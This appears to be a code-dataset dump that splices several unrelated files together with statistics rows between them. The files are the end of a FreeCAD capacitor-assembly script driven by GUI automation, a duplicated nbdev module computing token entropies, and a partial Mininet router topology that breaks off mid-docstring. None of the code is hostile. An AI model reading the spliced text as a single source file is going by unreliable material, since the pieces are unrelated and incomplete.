    alpha=(i*degre*math.pi)/180
    hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
    hole = Part.makeCylinder(2.5, 3)
    hole.translate(hole_vector)
    cylinder_1 = cylinder_1.cut(hole)
# holes for fixing the anodes and the cathodes
degre = 60
for i in range(int(360/degre)):
    radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
    alpha=(i*degre*math.pi)/180
    hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
    hole = Part.makeCylinder(5, 3)
    hole.translate(hole_vector)
    cylinder_1 = cylinder_1.cut(hole)
Part.show(cylinder_1)
DOC.recompute()
# insertion part_rondelle_m10_17d - 0
degre = 60
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
alpha=(degre*math.pi)/180
vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), -1)
Mesh.insert(u"part_rondelle_m10_17d.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_rondelle_m10_17d").Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_rondelle_m10_17d").ShapeColor = (1.00,1.00,0.00)
# For placing the part_rondelle_m10_17d
i1 = 1
degres = [120, 180, 240, 300, 360]
for degre in degres:
    radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
    alpha=(degre*math.pi)/180
    vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), -1)
    Mesh.insert(u"part_rondelle_m10_17d.stl", "assembly")
    FreeCAD.getDocument("assembly").getObject("part_rondelle_m10_17d00" + str(i1)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
    FreeCADGui.getDocument("assembly").getObject("part_rondelle_m10_17d00" + str(i1)).ShapeColor = (1.00,1.00,0.00)
    i1 += 1
# For placing the part_rondelle_m10_17d
for i in range(7, 14):
    Mesh.insert(u"part_rondelle_m10_17d.stl", "assembly")
for i in range(7, 13):
    alpha=(i*60*math.pi)/180
    radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
    vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 3)
    if i < 10:
        FreeCAD.getDocument("assembly").getObject("part_rondelle_m10_17d00" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
        FreeCADGui.getDocument("assembly").getObject("part_rondelle_m10_17d00" + str(i)).ShapeColor = (1.00,1.00,0.00)
    else:
        FreeCAD.getDocument("assembly").getObject("part_rondelle_m10_17d0" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
        FreeCADGui.getDocument("assembly").getObject("part_rondelle_m10_17d0" + str(i)).ShapeColor = (1.00,1.00,0.00)
# insertion part_vis_metal_m10_200l - 0
degre = 60
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
alpha=(degre*math.pi)/180
vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), -3)
Mesh.insert(u"part_vis_metal_m10_200l.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_vis_metal_m10_200l").Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_vis_metal_m10_200l").ShapeColor = (0.00,1.00,1.00)
# For placing the part_vis_metal_m10_200l
i1 = 1
degres = [120, 180, 240, 300, 360]
for degre in degres:
    radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
    alpha=(degre*math.pi)/180
    vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), -3)
    Mesh.insert(u"part_vis_metal_m10_200l.stl", "assembly")
    FreeCAD.getDocument("assembly").getObject("part_vis_metal_m10_200l00" + str(i1)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
    FreeCADGui.getDocument("assembly").getObject("part_vis_metal_m10_200l00" + str(i1)).ShapeColor = (0.00,1.00,1.00)
    i1 += 1
# insertion part_ecrou_10m - 0
degre = 60
radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
alpha=(degre*math.pi)/180
vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 4)
Mesh.insert(u"part_ecrou_10m.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_ecrou_10m").Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_ecrou_10m").ShapeColor = (0.00,0.00,1.00)
# For placing the part_ecrou_10m
i1 = 1
degres = [120, 180, 240, 300, 360]
for degre in degres:
    radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
    alpha=(degre*math.pi)/180
    vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 4)
    Mesh.insert(u"part_ecrou_10m.stl", "assembly")
    FreeCAD.getDocument("assembly").getObject("part_ecrou_10m00" + str(i1)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
    FreeCADGui.getDocument("assembly").getObject("part_ecrou_10m00" + str(i1)).ShapeColor = (0.00,0.00,1.00)
    i1 += 1
# For placing the part_rondelle_m10_17d
for i in range(15, 21):
    Mesh.insert(u"part_rondelle_m10_17d.stl", "assembly")
for i in range(13, 19):
    alpha=(i*60*math.pi)/180
    radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
    vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 8)
    FreeCAD.getDocument("assembly").getObject("part_rondelle_m10_17d0" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
    FreeCADGui.getDocument("assembly").getObject("part_rondelle_m10_17d0" + str(i)).ShapeColor = (1.00,1.00,0.00)
# insertion part_capacitor_plate - 0
vector = App.Vector(0, 0, 9)
Mesh.insert(u"part_capacitor_plate.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_capacitor_plate").Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
FreeCADGui.getDocument("assembly").getObject("part_capacitor_plate").ShapeColor = (0.00,0.50,0.50)
# For placing the part_rondelle_m10_17d
for i in range(22, 28):
    Mesh.insert(u"part_rondelle_m10_17d.stl", "assembly")
for i in range(19, 25):
    alpha=(i*60*math.pi)/180
    radius = diametre_maximal/2 - 3 - 5 - 3 - 2 - 3 - 2 - 2 - 4 - 5
    vector = App.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 10)
    FreeCAD.getDocument("assembly").getObject("part_rondelle_m10_17d0" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
    FreeCADGui.getDocument("assembly").getObject("part_rondelle_m10_17d0" + str(i)).ShapeColor = (1.00,1.00,0.00)
# insertion part_capacitor_plate - 1
vector = App.Vector(0, 0, 11)
Mesh.insert(u"part_capacitor_plate.stl", "assembly")
FreeCAD.getDocument("assembly").getObject("part_capacitor_plate001").Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 60))
FreeCADGui.getDocument("assembly").getObject("part_capacitor_plate001").ShapeColor = (0.00,0.50,0.50)
# For placing all the part_capacitor_plate
for i in range(2, 10):
    if i % 2 == 0:
        vector = App.Vector(0, 0, i*2 + 9)
        Mesh.insert(u"part_capacitor_plate.stl", "assembly")
        FreeCAD.getDocument("assembly").getObject("part_capacitor_plate00" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
        FreeCADGui.getDocument("assembly").getObject("part_capacitor_plate00" + str(i)).ShapeColor = (0.00,0.50,0.50)
    else:
        vector = App.Vector(0, 0, i*2 + 9)
        Mesh.insert(u"part_capacitor_plate.stl", "assembly")
        FreeCAD.getDocument("assembly").getObject("part_capacitor_plate00" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 60))
        FreeCADGui.getDocument("assembly").getObject("part_capacitor_plate00" + str(i)).ShapeColor = (0.00,0.50,0.50)
# For placing all the part_capacitor_plate
for i in range(10, 90):
    if i % 2 == 0:
        vector = App.Vector(0, 0, i*2 + 9)
        Mesh.insert(u"part_capacitor_plate.stl", "assembly")
        FreeCAD.getDocument("assembly").getObject("part_capacitor_plate0" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 0))
        FreeCADGui.getDocument("assembly").getObject("part_capacitor_plate0" + str(i)).ShapeColor = (0.00,0.50,0.50)
    else:
        vector = App.Vector(0, 0, i*2 + 9)
        Mesh.insert(u"part_capacitor_plate.stl", "assembly")
        FreeCAD.getDocument("assembly").getObject("part_capacitor_plate0" + str(i)).Placement = App.Placement(vector, App.Rotation(App.Vector(0,0,1), 60))
        FreeCADGui.getDocument("assembly").getObject("part_capacitor_plate0" + str(i)).ShapeColor = (0.00,0.50,0.50)
setview()
""")
        # GUI automation: focus FreeCAD, open its Python console, and run the script.
        time.sleep(3)
        pywinauto.mouse.click(button="left", coords=(460, 750))
        time.sleep(3)
        pywinauto.mouse.click(button="left", coords=(70, 670))
        time.sleep(3)
        pywinauto.keyboard.send_keys(
            'exec{(}open{(}"assembly.py"{)}.read{(}{)}{)}'
        )
        time.sleep(3)
        pywinauto.keyboard.send_keys('{ENTER}')
if __name__ == '__main__':
    # Run the GUI-driven generation tests when executed as a script.
    unittest.main()
| 27.43207 | 155 | 0.676207 | 5,054 | 34,729 | 4.448753 | 0.040958 | 0.037627 | 0.019569 | 0.037182 | 0.954012 | 0.92746 | 0.896549 | 0.865994 | 0.857321 | 0.852784 | 0 | 0.060409 | 0.188258 | 34,729 | 1,265 | 156 | 27.453755 | 0.73715 | 0.013274 | 0 | 0.756243 | 0 | 0.084423 | 0.812175 | 0.406321 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01308 | false | 0 | 0.019025 | 0 | 0.033294 | 0.026159 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
7daf156b7213e83b377b3611d59eb8b6280e3642 | 11,564 | py | Python | ds4se/exp/info-[inspect].py | LeyliG/ds4se | ed8191cfb62c53a0ea9626a54f54f23bd31c3e59 | [
"Apache-2.0"
] | 1 | 2021-01-21T04:24:03.000Z | 2021-01-21T04:24:03.000Z | ds4se/exp/info-[inspect].py | LeyliG/ds4se | ed8191cfb62c53a0ea9626a54f54f23bd31c3e59 | [
"Apache-2.0"
] | null | null | null | ds4se/exp/info-[inspect].py | LeyliG/ds4se | ed8191cfb62c53a0ea9626a54f54f23bd31c3e59 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/1.1_exp.info-[inspect].ipynb (unless otherwise specified).
# Public API of this auto-generated (nbdev-exported) module.
# NOTE(review): every name is listed twice because the notebook cells were
# exported twice below; the later, identical definitions win at import time.
__all__ = ['logger', 'get_cnts', 'encode_text', 'get_freqs', 'get_dist', 'get_entropies_from_docs',
           'get_entropy_from_docs', 'get_doc_entropies_from_df', 'get_corpus_entropies_from_df',
           'get_system_entropy_from_df', 'shared_cnts_from_docs', 'shared_entropy_from_docs', 'shared_entropy_from_df',
           'info_content', 'get_shared_probs_from_docs', 'logger', 'get_cnts', 'encode_text', 'get_freqs', 'get_dist',
           'get_entropies_from_docs', 'get_entropy_from_docs', 'get_doc_entropies_from_df',
           'get_corpus_entropies_from_df', 'get_system_entropy_from_df', 'shared_cnts_from_docs',
           'shared_entropy_from_docs', 'shared_entropy_from_df', 'info_content', 'get_shared_probs_from_docs']
# Cell
# Imports
import dit
import math
import os
import logging
import matplotlib.pyplot as plt
import pandas as pd
import sentencepiece as sp
from collections import Counter
from pathlib import Path
from scipy.stats import sem, t
from statistics import mean, median, stdev
from tqdm.notebook import tqdm
import functools
# Cell
# Module-level logger; basicConfig installs a timestamped format on the root
# logger.  NOTE(review): configuring the root logger at import time affects
# the whole application — confirm this is intended.
logger = logging.getLogger(__name__)
logging.basicConfig(
    format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
    datefmt="%m/%d/%Y %H:%M:%S",
    level=logging.INFO,
)
# Cell
def get_cnts(toks, vocab):
    """Count the tokens of ONE document on top of the vocabulary baseline.

    `vocab` maps every known token to 0, so the returned Counter contains an
    entry for every vocabulary token even when it never occurs in `toks`.
    (original credit: @danaderp)
    """
    counts = Counter(vocab)
    counts.update(toks)  # adds one per occurrence, same as a manual loop
    return counts
# Cell
def encode_text(text, model_prefix):
    """Tokenize *text* with the pre-trained SentencePiece model at
    `<model_prefix>.model` and return a Counter of piece occurrences that
    also contains a zero entry for every piece in the model's vocabulary.
    (original credit: @danaderp)
    """
    processor = sp.SentencePieceProcessor()
    processor.Load(f"{model_prefix}.model")
    pieces = processor.encode_as_pieces(text)
    # Zero-initialised vocabulary: one entry per piece id known to the model.
    vocab = {processor.id_to_piece(piece_id): 0 for piece_id in range(processor.get_piece_size())}
    return get_cnts(pieces, vocab)
# Cell
def get_freqs(dict_token_counts):
    """Relative frequency of every token, in the mapping's iteration order."""
    total = sum(dict_token_counts.values())  # number of subwords in the document
    return [count / total for count in dict_token_counts.values()]
# Cell
def get_dist(token_counts):
    '''Build a dit.ScalarDistribution from a counter of token occurrences.
    (original credit: @danaderp)

    Fix: the alphabet is now taken in the counter's own (insertion) order.
    The previous `list(set(token_counts.keys()))` shuffled the outcomes into
    arbitrary hash order while `get_freqs` produced frequencies in dict
    order, so outcomes were paired positionally with the wrong
    probabilities.  Entropy (order-invariant) was unaffected, but the
    distribution object itself mapped tokens to wrong probabilities.
    '''
    alphabet = list(token_counts.keys())   # dict keys are already unique
    frequencies = get_freqs(token_counts)  # same iteration order as alphabet
    return dit.ScalarDistribution(alphabet, frequencies)
# Cell
def get_entropies_from_docs(docs, vocab):
    """Shannon entropy of each document's token distribution (one value per doc)."""
    return [
        dit.shannon.entropy(get_dist(get_cnts(doc, vocab)))
        for doc in tqdm(docs)
    ]
# Cell
def get_entropy_from_docs(docs, vocab):
    """Shannon entropy of the token distribution of all *docs* pooled together.

    Fix: removed the unused `entropies = []` accumulator left over from
    get_entropies_from_docs.
    """
    token_counts = Counter(vocab)
    for doc in tqdm(docs):
        # NOTE(review): Counter.__iadd__ drops non-positive entries, so
        # zero-count vocabulary tokens disappear after the first addition,
        # unlike get_entropies_from_docs which keeps them — confirm intended.
        token_counts += get_cnts(doc, vocab)
    return dit.shannon.entropy(get_dist(token_counts))
# Cell
def get_doc_entropies_from_df(df, col, model_path, data_types):
    '''Returns a list of the entropies of each entry in a dataframe column,
    grouped per `data_type` (one inner list per requested data type).'''
    all_entropies = []
    for data_type in data_types:
        corpus = df.loc[df['data_type'] == data_type]
        per_doc = [
            dit.shannon.entropy(get_dist(encode_text(text, model_path)))
            for text in corpus[col]
        ]
        all_entropies.append(per_doc)
    return all_entropies
# Cell
def get_corpus_entropies_from_df(df, col, model_path, data_types):
    """One entropy value per data type: token counts of all rows of that
    type are pooled before the entropy is computed."""
    entropies = []
    for data_type in data_types:
        corpus = df.loc[df['data_type'] == data_type]
        pooled = sum(
            (encode_text(text, model_path) for text in corpus[col]),
            Counter(),
        )
        entropies.append(dit.shannon.entropy(get_dist(pooled)))
    return entropies
# Cell
def get_system_entropy_from_df(df, col, model_path):
    """Entropy of the whole system: token counts pooled over every row of *col*."""
    totals = Counter()
    for text in df[col]:
        totals = totals + encode_text(text, model_path)
    return dit.shannon.entropy(get_dist(totals))
# Cell
def shared_cnts_from_docs(sys_docs, vocab):
    """Pooled token counts per system: one Counter for each document
    collection in *sys_docs*, seeded with the zero-valued vocabulary."""
    per_system = []
    for docs in sys_docs:
        totals = Counter(vocab)
        for doc in tqdm(docs):
            totals += get_cnts(doc, vocab)
        per_system.append(totals)
    return per_system
# Cell
def shared_entropy_from_docs(sys_docs, vocab):
    """Entropy of the pooled counts restricted to the tokens that appear in
    every system's count table.

    Fix: `sum(cnts, Counter(vocab))` used to be re-evaluated inside the dict
    comprehension for every shared token (accidentally quadratic); it is now
    computed once before the comprehension.
    """
    cnts = shared_cnts_from_docs(sys_docs, vocab)
    # Tokens present in every per-system counter.
    shared = set(cnts[0])
    for cnt in cnts[1:]:
        shared &= set(cnt)
    pooled = sum(cnts, Counter(vocab))  # hoisted: loop-invariant
    overlap = Counter({tok: pooled.get(tok, 0) for tok in shared})
    return dit.shannon.entropy(get_dist(overlap))
# Cell
def shared_entropy_from_df(df, col, model_path, data_types):
    """Entropy of the pooled counts restricted to tokens present in every
    data type's corpus of the dataframe column *col*.

    Fix: `sum(cnts, Counter())` used to be re-evaluated inside the dict
    comprehension for every shared token (accidentally quadratic); it is now
    computed once before the comprehension.
    """
    cnts = []
    for data_type in data_types:
        corpus = df.loc[df['data_type'] == data_type]
        token_counts = Counter()
        for text in corpus[col]:
            token_counts += encode_text(text, model_path)
        cnts.append(token_counts)
    # Tokens present in every per-type counter.
    shared = set(cnts[0])
    for cnt in cnts[1:]:
        shared &= set(cnt)
    pooled = sum(cnts, Counter())  # hoisted: loop-invariant
    overlap = Counter({tok: pooled.get(tok, 0) for tok in shared})
    return dit.shannon.entropy(get_dist(overlap))
# Cell
def info_content(freqs):
    """Total self-information, in bits, of the given probability values."""
    return sum(math.log(1 / freq, 2) for freq in freqs)
# Cell
def get_shared_probs_from_docs(sys_docs, vocab):
    """Return (total probability mass, mean self-information) of the tokens
    that appear in every system's count table; the mean is 0 when no token
    is shared."""
    cnts = shared_cnts_from_docs(sys_docs, vocab)
    shared = set(cnts[0])
    for counts in cnts[1:]:
        shared &= set(counts)
    pooled = sum(cnts, Counter())
    shared_freqs = [
        freq for tok, freq in zip(pooled, get_freqs(pooled)) if tok in shared
    ]
    mean_info = info_content(shared_freqs) / len(shared_freqs) if shared_freqs else 0
    return sum(shared_freqs), mean_info
# Cell
# Imports
import dit
import math
import os
import logging
import matplotlib.pyplot as plt
import pandas as pd
import sentencepiece as sp
from collections import Counter
from pathlib import Path
from scipy.stats import sem, t
from statistics import mean, median, stdev
from tqdm.notebook import tqdm
import functools
# Cell
from pandas.plotting import lag_plot
from pandas.plotting import scatter_matrix
# Cell
# Duplicate of the logger setup earlier in this auto-generated module
# (the notebook cell was exported twice); re-running basicConfig is a no-op
# once the root logger already has handlers.
logger = logging.getLogger(__name__)
logging.basicConfig(
    format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
    datefmt="%m/%d/%Y %H:%M:%S",
    level=logging.INFO,
)
# Cell
def get_cnts(toks, vocab):
    '''@danaderp
    Counts tokens within ONE document'''
    # Duplicate of the get_cnts definition earlier in this auto-generated
    # module (same notebook cell exported twice); this later copy wins.
    cnt = Counter(vocab)
    for tok in toks:
        cnt[tok] += 1
    return cnt
# Cell
def encode_text(text, model_prefix):
    '''@danaderp
    Encodes text using a pre-trained sp model, returns the occurrences of each token in the text'''
    # Duplicate of the encode_text definition earlier in this module
    # (nbdev double export); this later copy wins at import time.
    sp_processor = sp.SentencePieceProcessor()
    sp_processor.Load(f"{model_prefix}.model")
    encoding = sp_processor.encode_as_pieces(text)
    vocab = {sp_processor.id_to_piece(id): 0 for id in range(sp_processor.get_piece_size())}
    token_counts = get_cnts(encoding, vocab)
    return token_counts
# Cell
def get_freqs(dict_token_counts):
    # Duplicate of the get_freqs definition earlier in this module
    # (nbdev double export).  Returns per-token relative frequencies.
    num_tokens = sum( dict_token_counts.values() ) #number of subwords inside the document
    frequencies = [ (dict_token_counts[token])/num_tokens for token in dict_token_counts ]
    return frequencies
# Cell
def get_dist(token_counts):
    '''@danaderp
    Takes in a counter object of token occurrences, computes the entropy of the corpus that produced it'''
    # Duplicate of the get_dist definition earlier in this module (nbdev
    # double export).  NOTE(review): list(set(...)) reorders the alphabet
    # while the frequencies stay in dict order, so the positional pairing
    # of outcomes and probabilities is scrambled — entropy is unaffected,
    # but the distribution object itself is wrong; see the earlier copy.
    alphabet = list(set(token_counts.keys()))
    frequencies = get_freqs(token_counts)
    return dit.ScalarDistribution(alphabet, frequencies)
# Cell
def get_entropies_from_docs(docs, vocab):
    # Duplicate definition (nbdev double export).  One Shannon entropy
    # value per document.
    entropies = []
    for doc in tqdm(docs):
        token_counts = get_cnts(doc, vocab)
        entropies.append(dit.shannon.entropy(get_dist(token_counts)))
    return entropies
# Cell
def get_entropy_from_docs(docs, vocab):
    # Duplicate definition (nbdev double export).  Entropy of all docs
    # pooled together.  NOTE(review): `entropies` is never used.
    entropies = []
    token_counts = Counter(vocab)
    for doc in tqdm(docs):
        token_counts += get_cnts(doc, vocab)
    return dit.shannon.entropy(get_dist(token_counts))
# Cell
def get_doc_entropies_from_df(df, col, model_path, data_types):
    '''Returns a list of the entropies of each entry in a dataframe column'''
    # Duplicate definition (nbdev double export); one inner list per data type.
    all_entropies = []
    for data_type in data_types:
        corpus = df.loc[df['data_type'] == data_type]
        entropies = []
        for data in corpus[col]:
            token_counts= encode_text(data, model_path)
            entropies.append(dit.shannon.entropy(get_dist(token_counts)))
        all_entropies.append(entropies)
    return all_entropies
# Cell
def get_corpus_entropies_from_df(df, col, model_path, data_types):
    # Duplicate definition (nbdev double export).  One entropy per data
    # type, over the pooled token counts of that type's rows.
    entropies = []
    for data_type in data_types:
        corpus = df.loc[df['data_type'] == data_type]
        token_counts = Counter()
        for data in corpus[col]:
            token_counts += encode_text(data, model_path)
        entropies.append(dit.shannon.entropy(get_dist(token_counts)))
    return entropies
# Cell
def get_system_entropy_from_df(df, col, model_path):
    # Duplicate definition (nbdev double export).  Entropy of the token
    # counts pooled over every row of *col*.
    token_counts = Counter()
    for data in df[col]:
        token_counts += encode_text(data, model_path)
    return dit.shannon.entropy(get_dist(token_counts))
# Cell
def shared_cnts_from_docs(sys_docs, vocab):
    # Duplicate definition (nbdev double export).  One pooled Counter per
    # document collection in sys_docs.
    cnts = []
    for docs in sys_docs:
        token_counts = Counter(vocab)
        for doc in tqdm(docs):
            token_counts += get_cnts(doc, vocab)
        cnts.append(token_counts)
    return cnts
# Cell
def shared_entropy_from_docs(sys_docs, vocab):
    # Duplicate definition (nbdev double export).  Entropy over the tokens
    # present in every system.  NOTE(review): sum(cnts, ...) is re-evaluated
    # for every key of the comprehension (quadratic); see the earlier copy.
    cnts = shared_cnts_from_docs(sys_docs, vocab)
    overlap = set(cnts[0])
    for i, cnt in enumerate(cnts[1:]):
        overlap &= set(cnt)
    overlap = Counter({k: sum(cnts, Counter(vocab)).get(k, 0) for k in list(overlap)})
    return dit.shannon.entropy(get_dist(overlap))
# Cell
def shared_entropy_from_df(df, col, model_path, data_types):
    # Duplicate definition (nbdev double export).  Entropy over the tokens
    # present in every data type's corpus.  NOTE(review): sum(cnts, ...) is
    # re-evaluated per comprehension key (quadratic); see the earlier copy.
    cnts = []
    for data_type in data_types:
        corpus = df.loc[df['data_type'] == data_type]
        token_counts = Counter()
        for data in corpus[col]:
            token_counts += encode_text(data, model_path)
        cnts.append(token_counts)
    overlap = set(cnts[0])
    for i, cnt in enumerate(cnts[1:]):
        overlap &= set(cnt)
    overlap = Counter({k: sum(cnts, Counter()).get(k, 0) for k in list(overlap)})
    return dit.shannon.entropy(get_dist(overlap))
# Cell
def info_content(freqs):
    # Duplicate definition (nbdev double export).  Total self-information
    # (in bits) of the given probabilities.
    tot = 0
    for freq in freqs:
        tot += math.log(1 / freq, 2)
    return tot
# Cell
def get_shared_probs_from_docs(sys_docs, vocab):
    # Duplicate definition (nbdev double export).  Returns (total probability
    # mass of shared tokens, their mean self-information; 0 if none shared).
    cnts = shared_cnts_from_docs(sys_docs, vocab)
    overlap = set(cnts[0])
    for i, cnt in enumerate(cnts[1:]):
        overlap &= set(cnt)
    all_cnts = sum(cnts, Counter())
    freqs = []
    for tok, freq in zip(all_cnts, get_freqs(all_cnts)):
        if tok in overlap:
            freqs.append(freq)
    return sum(freqs), info_content(freqs) / len(freqs) if len(freqs) != 0 else 0
7ddb9e7b6f7c5afe006334e4db9571b3c5256717 | 76,670 | py | Python | Topology/build_topo_test1.py | Balzu/network-inference-with-Blockchain | 0ce67d44662771b3e575fdb1b3cebd5a233e6c6e | [
"MIT"
] | 1 | 2019-04-01T13:21:52.000Z | 2019-04-01T13:21:52.000Z | Topology/build_topo_test1.py | Balzu/network-inference-with-Blockchain | 0ce67d44662771b3e575fdb1b3cebd5a233e6c6e | [
"MIT"
] | null | null | null | Topology/build_topo_test1.py | Balzu/network-inference-with-Blockchain | 0ce67d44662771b3e575fdb1b3cebd5a233e6c6e | [
"MIT"
] | 1 | 2020-06-17T23:29:53.000Z | 2020-06-17T23:29:53.000Z | #!/us5/bin/python
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.node import Node
from mininet.log import setLogLevel, info
from mininet.cli import CLI
import pdb
class LinuxRouter(Node):
    """A mininet Node configured as an IPv4 router (kernel forwarding on)."""

    def config(self, **params):
        super(LinuxRouter, self).config(**params)
        # Turn on kernel IP forwarding so traffic is routed between interfaces.
        self.cmd('sysctl net.ipv4.ip_forward=1')

    def terminate(self):
        # Restore the kernel default (no forwarding) before tearing down.
        self.cmd('sysctl net.ipv4.ip_forward=0')
        super(LinuxRouter, self).terminate()
class NetworkTopo1( Topo ):
    """
    This topology simulates a network with 6 hosts: 3 belong to subnet 192.168.1.0/24 and the other three
    belong to subnet 192.168.2.0/24. The two subnets are linked together with a router.
    3 options are available:
        one sensor in first subnet,
        one sensor in second subnet,
        one sensor in both subnets.
    """

    def __init__(self, *args, **params):
        '''
        :param sensor1: True if a sensor has to be placed in subnet 192.168.1.0/24
        :param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
        '''
        # .get() tolerates a missing 'sensorX' key (the original indexed params
        # directly and raised KeyError); bool() maps None/False to False.
        self.sensor1 = bool(params.get('sensor1'))  # Boolean
        self.sensor2 = bool(params.get('sensor2'))  # Boolean
        self.swc = {}  # Key: Number of switch, value: switch
        self.net_hosts = []
        self.active_sensors = []
        self.passive_sensors = []
        self.monitor_sensors = []
        self.alias = {}  # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
        self.sroutes = {}  # Key: Router/Host/sensor id, value = list of static routes to be setup
        super(NetworkTopo1, self).__init__()

    def build( self, **_opts ):
        """Create the central router, one switch per subnet and three hosts per subnet."""
        self.router = self.addNode( 'r1', cls=LinuxRouter, ip='192.168.1.1/24' )  #'14.21.5.38/8'
        self.alias['r1'] = []
        self.sroutes['r1'] = []
        for i in range(1, 3):  # 2 subnets
            self.swc[i] = self.addSwitch('s' + str(i))
            rIP = '192.168.' + str(i) + '.1'
            # Router port towards this subnet (r1-eth1 / r1-eth2); added before the
            # host links so the switch/router interface numbering stays as before.
            self.addLink(self.swc[i], self.router, intfName2='r1-eth' + str(i),
                         params2={'ip': rIP + '/24'})
            self.alias['r1'].append(rIP)
            # Three plain hosts per subnet: h0..h2 on subnet 1, h3..h5 on subnet 2,
            # with host addresses .2, .3 and .4.
            for j in range(3):
                hid = 'h' + str((i - 1) * 3 + j)
                hIP = '192.168.' + str(i) + '.' + str(j + 2)
                self.net_hosts.append(self.addHost(hid, ip=hIP + '/24', defaultRoute=rIP))
                self.addLink(hid, self.swc[i])
                self.alias[hid] = [hIP]
                self.sroutes['r1'].append('ip route add ' + hIP + '/32 via ' + hIP + ' dev r1-eth' + str(i))
                self.sroutes[hid] = ['ip route add default via ' + rIP + ' dev ' + hid + '-eth0']
        # In Mininet you can't send simultaneously 2 commands to the same host. To circumvent this limitation
        # we create 3 hosts for each sensor, connected to the same switch: the active host looks for dead nodes,
        # the passive host looks for new nodes, the monitor host runs the topology inference algorithm
        if self.sensor1:
            self.add_sensor(1)
        if self.sensor2:
            self.add_sensor(2)

    def add_sensor(self, i):
        """Attach the active/passive/monitor sensor triple to subnet i's switch."""
        asid = 'has' + str(i)
        psid = 'hps' + str(i)
        msid = 'hms' + str(i)
        rIP = '192.168.' + str(i) + '.1'
        asIP = '192.168.' + str(i) + '.101'  # Active sensor IP
        psIP = '192.168.' + str(i) + '.102'  # Passive sensor IP
        msIP = '192.168.' + str(i) + '.103'  # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
        self.passive_sensors.append(self.addHost(psid, ip=psIP + '/24', defaultRoute=rIP))
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
        self.addLink(asid, self.swc[i])
        self.addLink(psid, self.swc[i])
        self.addLink(msid, self.swc[i])
        # The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
        self.alias[msid] = [asIP, psIP, msIP]
        self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth' + str(i))
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[psid] = ['ip route add default via ' + rIP + ' dev ' + psid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_static_routes(self, net):
        '''Add static routes to the router for subnets not directly visible'''
        for k in self.sroutes.keys():
            for r in self.sroutes[k]:
                net[k].cmd(r)

    def create_alias_file(self):
        '''Write the 'alias' file: one line per node, name followed by its IPs.'''
        with open('alias', 'w') as f:
            for k in self.alias.keys():
                f.write(k + ' ')
                for ip in self.alias[k]:
                    f.write(ip + ' ')
                f.write('\n')
class NetworkTopo2( Topo ):
    """
    This topology simulates a network with 20 hosts: ten belong to subnet 192.168.1.0/24 and the other ten
